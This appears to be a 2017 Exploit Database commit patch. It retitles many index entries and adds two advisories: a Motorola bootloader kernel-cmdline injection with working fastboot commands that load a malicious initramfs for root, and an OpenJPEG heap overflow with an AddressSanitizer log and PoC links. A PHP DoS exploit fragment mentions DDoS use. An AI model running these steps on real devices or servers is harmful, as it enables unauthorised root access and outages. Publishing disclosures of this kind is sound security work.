From a160bc0c68dcf642d18b48d6e7f252448315714b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 2 Sep 2017 05:01:21 +0000 Subject: [PATCH] DB: 2017-09-02 2 new exploits Mozilla Firefox 3.6.3 - Fork Bomb Denial of Service Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service) OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass Git <= 2.7.5 - Command Injection (Metasploit) Git < 2.7.5 - Command Injection (Metasploit) Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service Joomla! 1.0.7 / Mambo 4.5.3 - 'feed' Full Path Disclosure / Denial of Service Joomla! 1.0.9 - (Weblinks) Blind SQL Injection Joomla! 1.0.9 - 'Weblinks' Blind SQL Injection Joomla! 1.5.x - (Token) Remote Admin Change Password Joomla! 1.5.x - 'Token' Remote Admin Change Password Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion Joomla! Component & Plugin 'JE Tooltip' 1.0 - Local File Inclusion Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload Joomla! Component 'com_djClassifieds' 0.9.1 - Arbitrary File Upload Joomla! 1.6.0-Alpha2 - Cross-Site Scripting Joomla! 1.6.0 Alpha2 - Cross-Site Scripting Joomla! - Spam Mail Relay Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection Joomla! Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection --- files.csv | 28 +++++----- platforms/android/local/42601.txt | 31 +++++++++++ platforms/linux/dos/42600.txt | 86 +++++++++++++++++++++++++++++++ platforms/php/webapps/1698.php | 4 +- 4 files changed, 134 insertions(+), 15 deletions(-) create mode 100755 platforms/android/local/42601.txt create mode 100755 platforms/linux/dos/42600.txt diff --git a/files.csv b/files.csv index 3c009ea68..d05f80e77 100644 --- a/files.csv +++ b/files.csv @@ -1528,7 +1528,7 @@ id,file,description,date,author,platform,type,port 12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0 12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0 12491,platforms/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,"Inj3ct0r Team",multiple,dos,0 -12492,platforms/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb Denial of Service",2010-05-03,Dr_IDE,windows,dos,0 +12492,platforms/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)",2010-05-03,Dr_IDE,windows,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos,0 12508,platforms/osx/dos/12508.html,"Multiple browsers - 'history.go()' Denial of Service",2010-05-04,Dr_IDE,osx,dos,0 @@ -5664,6 +5664,7 @@ id,file,description,date,author,platform,type,port 42495,platforms/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0 42546,platforms/linux/dos/42546.txt,"libgig 4.0.0 (LinuxSampler) - Multiple Vulnerabilities",2017-08-23,qflb.wu,linux,dos,0 42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0 +42600,platforms/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -9221,6 +9222,7 @@ id,file,description,date,author,platform,type,port 42567,platforms/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0 42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0 42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0 +42601,platforms/android/local/42601.txt,"Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass",2017-09-01,"Roee Hay",android,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15783,7 +15785,7 @@ id,file,description,date,author,platform,type,port 42558,platforms/windows/remote/42558.py,"Disk Savvy Enterprise 9.9.14 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0 42559,platforms/windows/remote/42559.py,"Sync Breeze Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0 42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0 -42599,platforms/python/remote/42599.rb,"Git <= 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0 +42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16780,7 +16782,7 @@ id,file,description,date,author,platform,type,port 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0 1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0 -1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0 +1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - 'feed' Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - 'Haberler.asp' SQL Injection",2006-04-19,nukedx,asp,webapps,0 1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution",2006-04-20,rgod,php,webapps,0 @@ -16935,7 +16937,7 @@ id,file,description,date,author,platform,type,port 1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion",2006-06-16,K-159,php,webapps,0 1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0 1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0 -1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0 +1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - 'Weblinks' Blind SQL Injection",2006-06-17,rgod,php,webapps,0 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps,0 1925,platforms/php/webapps/1925.txt,"Indexu 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Parameter Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0 @@ -19943,7 +19945,7 @@ id,file,description,date,author,platform,type,port 6231,platforms/php/webapps/6231.txt,"pPIM 1.0 - upload/change Password",2008-08-11,Stack,php,webapps,0 6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - 'item' Parameter SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - 'mod' Parameter SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0 -6234,platforms/php/webapps/6234.txt,"Joomla! 1.5.x - (Token) Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0 +6234,platforms/php/webapps/6234.txt,"Joomla! 1.5.x - 'Token' Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0 6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - 'img' Parameter Remote File Disclosure",2008-08-13,JIKO,php,webapps,0 6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Parameter Local File Inclusion",2008-08-15,Don,php,webapps,0 6249,platforms/php/webapps/6249.txt,"Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection",2008-08-15,"Hussin X",php,webapps,0 @@ -23288,7 +23290,7 @@ id,file,description,date,author,platform,type,port 11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting",2010-03-19,Red-D3v1L,php,webapps,0 11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit",2010-03-19,"Easy Laster",php,webapps,0 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps,0 -11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 +11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin 'JE Tooltip' 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 11815,platforms/php/webapps/11815.txt,"Joomla! Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download",2010-03-20,n01d,cgi,webapps,0 @@ -23708,13 +23710,13 @@ id,file,description,date,author,platform,type,port 12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,cr4wl3r,php,webapps,0 12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,cr4wl3r,php,webapps,0 12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps,0 -12479,platforms/php/webapps/12479.txt,"Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0 +12479,platforms/php/webapps/12479.txt,"Joomla! Component 'com_djClassifieds' 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0 12481,platforms/php/webapps/12481.txt,"WHMCompleteSolution (WHMCS) Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL Injection / XPath Injection",2010-05-02,indoushka,php,webapps,0 12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,php,webapps,0 12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-05-02,cr4wl3r,php,webapps,0 12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Inclusion",2010-05-03,cr4wl3r,php,webapps,0 -12489,platforms/php/webapps/12489.txt,"Joomla! 1.6.0-Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps,0 +12489,platforms/php/webapps/12489.txt,"Joomla! 1.6.0 Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps,0 14025,platforms/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 12496,platforms/php/webapps/12496.html,"KubeBlog - Cross-Site Request Forgery",2010-05-03,The.Morpheus,php,webapps,0 12499,platforms/php/webapps/12499.txt,"DBHcms 1.1.4 - Persistent Cross-Site Scripting",2010-05-04,ITSecTeam,php,webapps,0 @@ -25006,7 +25008,7 @@ id,file,description,date,author,platform,type,port 15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15971,platforms/php/webapps/15971.txt,"whCMS 0.115 - Cross-Site Request Forgery",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 - HTTP Referer Persistent Cross-Site Scripting",2011-01-12,"Saif El-Sherei",php,webapps,0 -15979,platforms/php/webapps/15979.txt,"Joomla! - Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0 +15979,platforms/php/webapps/15979.txt,"Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0 16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0 15989,platforms/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0 @@ -38137,7 +38139,7 @@ id,file,description,date,author,platform,type,port 41926,platforms/jsp/webapps/41926.txt,"Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection",2017-04-25,ERPScan,jsp,webapps,0 41927,platforms/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",multiple,webapps,0 41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0 -41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0 +41930,platforms/php/webapps/41930.txt,"Joomla! Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0 41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80 41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0 41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80 @@ -38379,6 +38381,6 @@ id,file,description,date,author,platform,type,port 42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0 42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0 42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0 -42596,platforms/php/webapps/42596.txt,"Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 -42597,platforms/php/webapps/42597.txt,"Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 -42598,platforms/php/webapps/42598.txt,"Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 +42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 +42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 +42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 diff --git a/platforms/android/local/42601.txt b/platforms/android/local/42601.txt new file mode 100755 index 000000000..0e571636f --- /dev/null +++ b/platforms/android/local/42601.txt @@ -0,0 +1,31 @@ +Sources: +https://alephsecurity.com/2017/08/30/untethered-initroot/ +https://github.com/alephsecurity/initroot + +initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) + +By Roee Hay / Aleph Research, HCL Technologies + +Recap of the Vulnerability and the Tethered-jailbreak + +1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection. +2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address. +3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices). +4. Exploiting the vulnerability allows the adversary to gain unconfined root shell. +5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot. +For example, here is a successful run of the exploit on cedric (Moto G5) + +$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598" +$ fastboot flash aleph initroot-cedric.cpio.gz +$ fastboot continue + +$ adb shell +cedric:/ # id +uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0 +cedric:/ # getenforce +Permissive +cedric:/ # + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42601.zip diff --git a/platforms/linux/dos/42600.txt b/platforms/linux/dos/42600.txt new file mode 100755 index 000000000..7511fa15f --- /dev/null +++ b/platforms/linux/dos/42600.txt @@ -0,0 +1,86 @@ +DESCRIPTION + +An Out-of-Bounds Write issue can be occurred in function opj_mqc_byteout of mqc.c during executing opj_compress. This issue was caused by a malformed BMP file. + +CREDIT + +This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB. + +TESTED VERSION + +Master version of OpenJPEG (805972f, 2016/09/12) + +EXCEPTION LOG + +==119535==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eeb5 + at pc 0x7f1b2f0154c2 bp 0x7ffec8559cc0 sp 0x7ffec8559cb8 +WRITE of size 1 at 0x60200000eeb5 thread T0 + #0 0x7f1b2f0154c1 in opj_mqc_byteout openjpeg-master/src/lib/openjp2/mqc.c:221:13 + #1 0x7f1b2f014bec in opj_mqc_flush openjpeg-master/src/lib/openjp2/mqc.c:421:2 + #2 0x7f1b2f042190 in opj_t1_encode_cblk openjpeg-master/src/lib/openjp2/t1.c:1685:3 + #3 0x7f1b2f040929 in opj_t1_encode_cblks openjpeg-master/src/lib/openjp2/t1.c:1539:7 + #4 0x7f1b2f06950d in opj_tcd_t1_encode openjpeg-master/src/lib/openjp2/tcd.c:2052:15 + #5 0x7f1b2f067b66 in opj_tcd_encode_tile openjpeg-master/src/lib/openjp2/tcd.c:1240:23 + #6 0x7f1b2efecc4f in opj_j2k_write_sod openjpeg-master/src/lib/openjp2/j2k.c:4358:15 + #7 0x7f1b2efea900 in opj_j2k_write_first_tile_part openjpeg-master/src/lib/openjp2/j2k.c:10659:15 + #8 0x7f1b2efc6d65 in opj_j2k_post_write_tile openjpeg-master/src/lib/openjp2/j2k.c:10448:15 + #9 0x7f1b2efc52c7 in opj_j2k_encode openjpeg-master/src/lib/openjp2/j2k.c:10199:23 + #10 0x7f1b2f00367c in opj_jp2_encode openjpeg-master/src/lib/openjp2/jp2.c:1955:9 + #11 0x7f1b2f01b304 in opj_encode openjpeg-master/src/lib/openjp2/openjpeg.c:737:11 + #12 0x4edc7d in main openjpeg-master/src/bin/jp2/opj_compress.c:1877:36 + #13 0x7f1b2d77682f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291 + #14 0x41a898 in _start (openjpeg-master/bin/opj_compress+0x41a898) + +0x60200000eeb5 is located 0 bytes to the right of 5-byte region [0x60200000eeb0,0x60200000eeb5) +allocated by thread T0 here: + #0 0x4ba9c8 in malloc (openjpeg-master/bin/opj_compress+0x4ba9c8) + #1 0x7f1b2f07369c in opj_malloc openjpeg-master/src/lib/openjp2/opj_malloc.c:195:10 + #2 0x7f1b2f06ed5f in opj_tcd_code_block_enc_allocate_data openjpeg-master/src/lib/openjp2/tcd.c:1097:36 + #3 0x7f1b2f0664b0 in opj_tcd_init_tile openjpeg-master/src/lib/openjp2/tcd.c:1023:14 + #4 0x7f1b2f0604e6 in opj_tcd_init_encode_tile openjpeg-master/src/lib/openjp2/tcd.c:1055:9 + #5 0x7f1b2efc57d3 in opj_j2k_pre_write_tile openjpeg-master/src/lib/openjp2/j2k.c:10300:15 + #6 0x7f1b2efc4d8d in opj_j2k_encode openjpeg-master/src/lib/openjp2/j2k.c:10146:23 + #7 0x7f1b2f00367c in opj_jp2_encode openjpeg-master/src/lib/openjp2/jp2.c:1955:9 + #8 0x7f1b2f01b304 in opj_encode openjpeg-master/src/lib/openjp2/openjpeg.c:737:11 + #9 0x4edc7d in main openjpeg-master/src/bin/jp2/opj_compress.c:1877:36 + #10 0x7f1b2d77682f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291 + +SUMMARY: AddressSanitizer: heap-buffer-overflow openjpeg-master/src/lib/openjp2/mqc.c:221:13 in opj_mqc_byteout +Shadow bytes around the buggy address: + 0x0c047fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 05 fa + 0x0c047fff9da0: fa fa 00 01 fa fa 05 fa fa fa 00 01 fa fa 05 fa + 0x0c047fff9db0: fa fa 00 01 fa fa 05 fa fa fa 00 01 fa fa 05 fa + 0x0c047fff9dc0: fa fa 00 01 fa fa 05 fa fa fa 00 01 fa fa 05 fa +=>0x0c047fff9dd0: fa fa 00 01 fa fa[05]fa fa fa 00 01 fa fa 00 fa + 0x0c047fff9de0: fa fa fd fd fa fa fd fd fa fa 00 00 fa fa 04 fa + 0x0c047fff9df0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 + 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==119535==ABORTING + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42600.zip diff --git a/platforms/php/webapps/1698.php b/platforms/php/webapps/1698.php index 88af177a4..b53e737f3 100755 --- a/platforms/php/webapps/1698.php +++ b/platforms/php/webapps/1698.php @@ -18,7 +18,7 @@ echo' -

Mambo/Joomla Path Disclosure & +

Mambo/Joomla Path Disclosure & (IIS Server-isapi mod) Remote Denial Of Service

by trueend5

Computer Security Science Researchers @@ -37,7 +37,7 @@ Institute

/mambo/ or just / )

prefix (default is - "kap")

+ "kap")

 useful when you want to Run this script twice or more at the same time against a target For DDOS.

  to perform it Just rename this file and choose a different